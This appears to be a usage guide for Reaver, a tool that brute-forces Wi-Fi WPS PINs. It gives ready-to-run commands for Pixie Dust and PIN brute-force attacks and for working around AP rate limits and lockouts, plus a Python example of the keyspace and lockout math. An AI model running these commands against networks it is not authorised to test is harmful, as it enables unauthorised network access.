Overview

Reaver attacks WPS by brute-forcing the 8-digit PIN. The PIN is verified in two 4-digit halves, which reduces the keyspace to ~11,000 combinations. Reaver also supports Pixie Dust for offline PIN recovery on vulnerable chipsets.
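
The keyspace figure above, worked through as an added example (not code from Reaver or from this documentation): the eighth PIN digit is a checksum of the first seven, so the split check costs at most 10^4 + 10^3 guesses. The function names, the 5-second guess time and the AP lockout policies are constructed for illustration; they show how much an AP-side lockout stretches the worst case.

```python
# Added example (not from the Reaver project): WPS PIN keyspace and lockout math.

def wps_checksum(first7: int) -> int:
    """Checksum digit derived from the first seven PIN digits."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)   # odd positions from the right weigh 3
        first7 //= 10
        accum += first7 % 10         # even positions weigh 1
        first7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when pin is 8 digits and digit 8 matches the checksum of digits 1-7."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def keyspace() -> dict:
    """Worst-case guess counts for a single check vs. the split check."""
    single = 10 ** 7                 # 7 free digits; digit 8 is computed
    split = 10 ** 4 + 10 ** 3        # half 1 (4 digits) + half 2 (3 free digits)
    return {"single_check": single, "split_check": split}


def worst_case_hours(guesses, secs_per_guess, lock_after, lock_secs):
    """Hours to exhaust `guesses` if the AP locks WPS for `lock_secs` after every
    `lock_after` failures. lock_after=0 models an AP with no lockout."""
    lockouts = (guesses - 1) // lock_after if lock_after else 0
    return (guesses * secs_per_guess + lockouts * lock_secs) / 3600


if __name__ == "__main__":
    total = keyspace()["split_check"]
    # Constructed AP policies: (failures before lock, lock duration in seconds)
    for lock_after, lock_secs in [(0, 0), (10, 60), (3, 300), (3, 3600)]:
        hours = worst_case_hours(total, 5, lock_after, lock_secs)
        print(f"lock after {lock_after:>2} for {lock_secs:>4}s: {hours:8.1f} h")
```

Even the strictest constructed policy only lengthens the worst case to a finite time, which is why turning WPS PIN mode off on the AP is the durable fix.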

Install

sudo apt install reaver

Usage

reaver -i <interface> -b <BSSID> [options]

Flag                 Description
-i <iface>           Monitor mode interface
-b <BSSID>           Target AP MAC address
-c <channel>         Target channel
-K 1                 Enable Pixie Dust attack
-S                   Resume saved session
-v / -vv             Verbose / extra verbose
-d <sec>             Delay between PIN attempts
--lock-delay <sec>   Wait after lockout detected
--fail-wait <sec>    Wait after consecutive failures
-p <PIN>             Try specific PIN
-N                   Don’t send NACK packets
-L                   Ignore AP lockouts

Pixie Dust Attack

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -vv

Pixie Dust exploits weak nonce generation and recovers the PIN offline in seconds on vulnerable chipsets.

PIN Brute Force

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv

Resume Session

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -S

Session state is saved in /etc/reaver/<BSSID>.wpc.

Tune for Rate Limiting

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv \
  --delay=5 \
  --lock-delay=300 \
  --fail-wait=360